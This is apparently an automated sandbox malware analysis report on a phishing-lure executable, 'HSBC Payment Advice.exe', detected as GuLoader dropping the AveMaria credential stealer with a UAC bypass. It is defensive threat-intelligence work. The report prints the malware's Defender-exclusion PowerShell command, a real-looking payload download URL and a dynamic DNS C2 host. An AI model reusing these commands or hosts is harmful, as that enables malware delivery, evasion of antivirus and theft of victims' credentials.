Loading ...

Play interactive tourEdit tour

Windows Analysis Report HSBC Payment Advice.exe

Overview

General Information

Sample Name:HSBC Payment Advice.exe
Analysis ID:528768
MD5:a069e61b357f625a7b3595150412c42d
SHA1:5fa560d04b13db7e0216bda2ca5f1c3b94a8912e
SHA256:0fb47a47bc025991b3ed8895aa84030def6e5cc538a9cec279a73f4528d549c6
Tags:exeHSBCsigned
Infos:

Most interesting Screenshot:

Detection

GuLoader AveMaria UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Increases the number of concurrent connection per server for Internet Explorer
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • HSBC Payment Advice.exe (PID: 6196 cmdline: "C:\Users\user\Desktop\HSBC Payment Advice.exe" MD5: A069E61B357F625A7B3595150412C42D)
    • HSBC Payment Advice.exe (PID: 5816 cmdline: "C:\Users\user\Desktop\HSBC Payment Advice.exe" MD5: A069E61B357F625A7B3595150412C42D)
      • powershell.exe (PID: 7140 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • images.exe (PID: 6136 cmdline: C:\ProgramData\images.exe MD5: A069E61B357F625A7B3595150412C42D)
        • images.exe (PID: 5216 cmdline: C:\ProgramData\images.exe MD5: A069E61B357F625A7B3595150412C42D)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://spuredge.com/warzone_JBBOxCEy72.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0x1cc30:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0x1cc30:$c1: Elevation:Administrator!new:
    0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
      0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
          Click to see the 18 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          • 0xd80:$c1: Elevation:Administrator!new:
          12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
            12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
              12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
              • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
              Click to see the 11 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Powershell Defender ExclusionShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC Payment Advice.exe" , ParentImage: C:\Users\user\Desktop\HSBC Payment Advice.exe, ParentProcessId: 5816, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7140
              Sigma detected: Non Interactive PowerShellShow sources
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC Payment Advice.exe" , ParentImage: C:\Users\user\Desktop\HSBC Payment Advice.exe, ParentProcessId: 5816, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7140
              Sigma detected: T1086 PowerShell ExecutionShow sources
              Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132823686502527122.7140.DefaultAppDomain.powershell

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://spuredge.com/warzone_JBBOxCEy72.bin"}
              Multi AV Scanner detection for submitted fileShow sources
              Source: HSBC Payment Advice.exeVirustotal: Detection: 56%Perma Link
              Source: HSBC Payment Advice.exeMetadefender: Detection: 20%Perma Link
              Source: HSBC Payment Advice.exeReversingLabs: Detection: 48%
              Yara detected AveMaria stealerShow sources
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Multi AV Scanner detection for domain / URLShow sources
              Source: spuredge.comVirustotal: Detection: 11%Perma Link
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\ProgramData\images.exeVirustotal: Detection: 56%Perma Link
              Source: C:\ProgramData\images.exeMetadefender: Detection: 20%Perma Link
              Source: C:\ProgramData\images.exeReversingLabs: Detection: 48%
              Machine Learning detection for sampleShow sources
              Source: HSBC Payment Advice.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped fileShow sources
              Source: C:\ProgramData\images.exeJoe Sandbox ML: detected
              Source: 12.0.HSBC Payment Advice.exe.400000.1.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 12.0.HSBC Payment Advice.exe.400000.3.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 28.0.images.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 12.0.HSBC Payment Advice.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 28.0.images.exe.400000.1.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 0.0.HSBC Payment Advice.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 21.2.images.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 21.0.images.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 0.2.HSBC Payment Advice.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 12.0.HSBC Payment Advice.exe.400000.2.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 28.0.images.exe.400000.2.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 28.0.images.exe.400000.3.unpackAvira: Label: TR/Dropper.VB.Gen

              Exploits:

              barindex
              Yara detected UACMe UAC Bypass toolShow sources
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR
              Source: HSBC Payment Advice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: unknownHTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49823 version: TLS 1.2
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: https://spuredge.com/warzone_JBBOxCEy72.bin
              Uses dynamic DNS servicesShow sources
              Source: unknownDNS query: name: barr2.ddns.net
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: spuredge.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: spuredge.comCache-Control: no-cache
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: HSBC Payment Advice.exe, 0000000C.00000003.502726009.0000000001B35000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501873155.0000000001B34000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.498183760.0000000001B36000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.509729103.0000000001B35000.00000004.00000020.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.498385567.0000000001B36000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://ocsp.digicert.com0O
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
              Source: HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmpString found in binary or memory: https://spuredge.com/warzone_JBBOxCEy72.bin
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownDNS traffic detected: queries for: spuredge.com
              Source: global trafficHTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: spuredge.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: spuredge.comCache-Control: no-cache
              Source: unknownHTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49823 version: TLS 1.2
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpBinary or memory string: GetRawInputData

              E-Banking Fraud:

              barindex
              Yara detected AveMaria stealerShow sources
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY

              System Summary:

              barindex
              Potential malicious icon foundShow sources
              Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
              Malicious sample detected (through community Yara rule)Show sources
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
              Initial sample is a PE file and has a suspicious nameShow sources
              Source: initial sampleStatic PE information: Filename: HSBC Payment Advice.exe
              Executable has a suspicious name (potential lure to open the executable)Show sources
              Source: HSBC Payment Advice.exeStatic file information: Suspicious name
              Source: HSBC Payment Advice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004011A8
              Source: C:\ProgramData\images.exeCode function: 28_2_017A95F9
              Source: C:\ProgramData\images.exeCode function: 28_2_017A922A
              Source: C:\ProgramData\images.exeCode function: 28_2_017A1819
              Source: C:\ProgramData\images.exeCode function: 28_2_017AF0C8
              Source: C:\ProgramData\images.exeCode function: 28_2_017A037F
              Source: C:\ProgramData\images.exeCode function: 28_2_017A5758
              Source: C:\ProgramData\images.exeCode function: 28_2_017AC713
              Source: C:\ProgramData\images.exeCode function: 28_2_017A4415
              Source: C:\ProgramData\images.exeCode function: 28_2_017A9AD4
              Source: C:\ProgramData\images.exeCode function: 28_2_017A76CA
              Source: C:\ProgramData\images.exeCode function: 28_2_017ADCC3
              Source: C:\ProgramData\images.exeCode function: 28_2_017A9483
              Source: C:\ProgramData\images.exeCode function: 28_2_017A95F9 NtAllocateVirtualMemory,
              Source: C:\ProgramData\images.exeCode function: 28_2_017AEB88 NtProtectVirtualMemory,
              Source: C:\ProgramData\images.exeProcess Stats: CPU usage > 98%
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess Stats: CPU usage > 98%
              Source: HSBC Payment Advice.exe, 00000000.00000000.245504475.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000000.376134620.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000002.517452791.000000001F0E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exeBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: images.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: HSBC Payment Advice.exeStatic PE information: invalid certificate
              Source: HSBC Payment Advice.exeVirustotal: Detection: 56%
              Source: HSBC Payment Advice.exeMetadefender: Detection: 20%
              Source: HSBC Payment Advice.exeReversingLabs: Detection: 48%
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile read: C:\Users\user\Desktop\HSBC Payment Advice.exeJump to behavior
              Source: HSBC Payment Advice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
